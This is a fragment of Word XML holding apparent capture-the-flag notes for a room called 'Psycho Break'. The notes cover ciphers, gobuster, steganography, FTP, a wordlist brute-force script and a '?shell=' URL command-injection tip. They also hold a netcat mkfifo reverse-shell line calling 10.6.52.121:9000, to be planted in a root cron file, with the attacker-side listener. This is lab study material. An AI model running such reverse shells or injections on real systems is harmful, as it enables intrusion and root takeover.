    <w:p w14:paraId="3F59F1F4" w14:textId="2752F382" w:rsidR="004E1EB1" w:rsidRDefault="004E1EB1" w:rsidP="004E1EB1">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="600EEA5C" w14:textId="6AE0A565" w:rsidR="004E1EB1" w:rsidRDefault="00D444CD" w:rsidP="004E1EB1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Psycho Break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473615EB" w14:textId="69163232" w:rsidR="00D444CD" w:rsidRDefault="00D444CD" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Ciphers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13909770" w14:textId="1E295A90" w:rsidR="00D444CD" w:rsidRDefault="00D444CD" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Vigenere</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338401CF" w14:textId="3BEBB354" w:rsidR="00D444CD" w:rsidRDefault="00D444CD" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Beaufort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4B7016" w14:textId="704428EF" w:rsidR="00D444CD" w:rsidRDefault="00D444CD" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E343C0" w14:textId="7A8FDBDD" w:rsidR="00D444CD" w:rsidRDefault="00D444CD" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hidden domains and subdomains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF2A8D7" w14:textId="7EB61183" w:rsidR="00D444CD" w:rsidRDefault="00D444CD" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reverse Image Searching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CADCE1" w14:textId="607B9524" w:rsidR="00D444CD" w:rsidRDefault="00D444CD" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Yandex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0015702E" w14:textId="636D4227" w:rsidR="00D444CD" w:rsidRDefault="00D444CD" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718FBA51" w14:textId="3327D7BC" w:rsidR="00D444CD" w:rsidRDefault="00D444CD" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>URL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8C27E2" w14:textId="33F909A8" w:rsidR="00D444CD" w:rsidRDefault="00D444CD" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>?shell=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F44E31" w14:textId="7765451F" w:rsidR="00D444CD" w:rsidRDefault="00D444CD" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>follow up with commands such as id, ls, ls ..</w:t>
      </w:r>
      <w:r w:rsidR="00B45E4A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> etc. for potential enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CD6249" w14:textId="03199B0B" w:rsidR="00D444CD" w:rsidRDefault="00D444CD" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>at the end of URL string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085DB450" w14:textId="53ADD6B3" w:rsidR="00B45E4A" w:rsidRDefault="00B45E4A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>File Download and Inspection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F127D4D" w14:textId="0B610B86" w:rsidR="00B45E4A" w:rsidRDefault="00B45E4A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>file &lt;filename&gt; command to check if a file has an incorrect extension (.jpg when actually .zip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2503DD30" w14:textId="33F86EEE" w:rsidR="00B45E4A" w:rsidRDefault="00B45E4A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>.wav files – online audio inspection tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC47940" w14:textId="025DAB60" w:rsidR="00B45E4A" w:rsidRDefault="00B45E4A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E842FF4" w14:textId="14477F45" w:rsidR="00B45E4A" w:rsidRDefault="00B45E4A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>steghide extract -sf &lt;filename.jpg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EA4021" w14:textId="27870DB1" w:rsidR="00A76B38" w:rsidRDefault="00A76B38" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03250391" w14:textId="745161C0" w:rsidR="00A76B38" w:rsidRDefault="00A76B38" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ftp &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71200439" w14:textId="696B7C58" w:rsidR="00A76B38" w:rsidRDefault="00A76B38" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8E2D42" w14:textId="56E87042" w:rsidR="00A76B38" w:rsidRDefault="00A76B38" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2777EF" w14:textId="33F58ECD" w:rsidR="00A76B38" w:rsidRDefault="00A76B38" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>lcd &lt;local directory path you want to download stuff to&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7422EA" w14:textId="3AB4892C" w:rsidR="00A76B38" w:rsidRDefault="00A76B38" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFF1FF9" w14:textId="2032A92F" w:rsidR="00A76B38" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Brute-forcing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52912965" w14:textId="1A5AF089" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>scripts that use wordlists and programs that have been downloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590DE330" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>import subprocess, sys, os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D17DB6" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>from subprocess import Popen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D0575A" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB4064B" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>with open('putthe.dict','r',encoding='UTF-8') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0762229F" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>#put-the-correct-name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD6EA27" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("Let's go!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E1C372" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for x in f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D13A7C2" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        l = str(x).rstrip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061791ED" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        vl = ["./puttheexecutable",l] #put-the-correct-name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5145F069" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        p = Popen(vl, stdout=subprocess.PIPE).stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0324D8A5" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        q = p.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3797E604" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59600A82" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        output = (str(q, 'UTF-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54801303" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if "Correct" in output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5066489C" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            os.system('clear')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFC5F6F" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            print("\n\nFound: ",x,"\nThe msg is:\n\n",output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E63291" w14:textId="77777777" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            f.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCA864C" w14:textId="4CD487B7" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            sys.exit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10675C69" w14:textId="5ACB3477" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>strings of numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A8A654" w14:textId="7EECFC67" w:rsidR="00FB1FFE" w:rsidRDefault="00FB1FFE" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>multi-tap phone cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649BE5E4" w14:textId="4B9510C0" w:rsidR="00AE1B21" w:rsidRDefault="00AE1B21" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Navigating Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B0652D" w14:textId="1117B839" w:rsidR="00AE1B21" w:rsidRDefault="00AE1B21" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56031A4E" w14:textId="34FEA9C5" w:rsidR="00AE1B21" w:rsidRDefault="00AE1B21" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for hidden files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C3CA8D" w14:textId="31C9D33F" w:rsidR="00AE1B21" w:rsidRDefault="00AE1B21" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>find / -name *string* 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9DE05" w14:textId="63B35AC9" w:rsidR="00AE1B21" w:rsidRDefault="00AE1B21" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AEC0E2" w14:textId="449D659E" w:rsidR="00AE1B21" w:rsidRDefault="00AE1B21" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65504499" w14:textId="6538E333" w:rsidR="00AE1B21" w:rsidRDefault="00AE1B21" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-rwxr-xrw-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5270FCA2" w14:textId="38C03B30" w:rsidR="00AE1B21" w:rsidRDefault="00AE1B21" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>rw- specifically at the end – world read/write enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AB7B8D" w14:textId="429C373D" w:rsidR="00AE1B21" w:rsidRDefault="00AE1B21" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cat /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0003A3" w14:textId="13207911" w:rsidR="005D429A" w:rsidRDefault="005D429A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>reverse shells in root permissions files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B8258F" w14:textId="77777777" w:rsidR="005D429A" w:rsidRDefault="005D429A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005D429A">
        <w:t>subprocess.call("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.6.52.121 9000 &gt;/tmp/f",shell=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689062AC" w14:textId="7E85BA95" w:rsidR="005D429A" w:rsidRDefault="005D429A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>on victim computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B53EBF3" w14:textId="07AB59A3" w:rsidR="005D429A" w:rsidRDefault="005D429A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nc -lvnp 9000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539A8846" w14:textId="478F075B" w:rsidR="005D429A" w:rsidRDefault="005D429A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>on attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551A086C" w14:textId="6008C1A9" w:rsidR="005D429A" w:rsidRDefault="005D429A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wait time of crontab of file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFA4823" w14:textId="37119DBF" w:rsidR="005D429A" w:rsidRDefault="005D429A" w:rsidP="005D429A">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F8752B" w14:textId="234678C9" w:rsidR="005D429A" w:rsidRDefault="00895D94" w:rsidP="005D429A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Overpass – Linpeas, Cronjobs, OWASP Top 10 - Cookies</w:t>
      </w:r>
    </w:p>
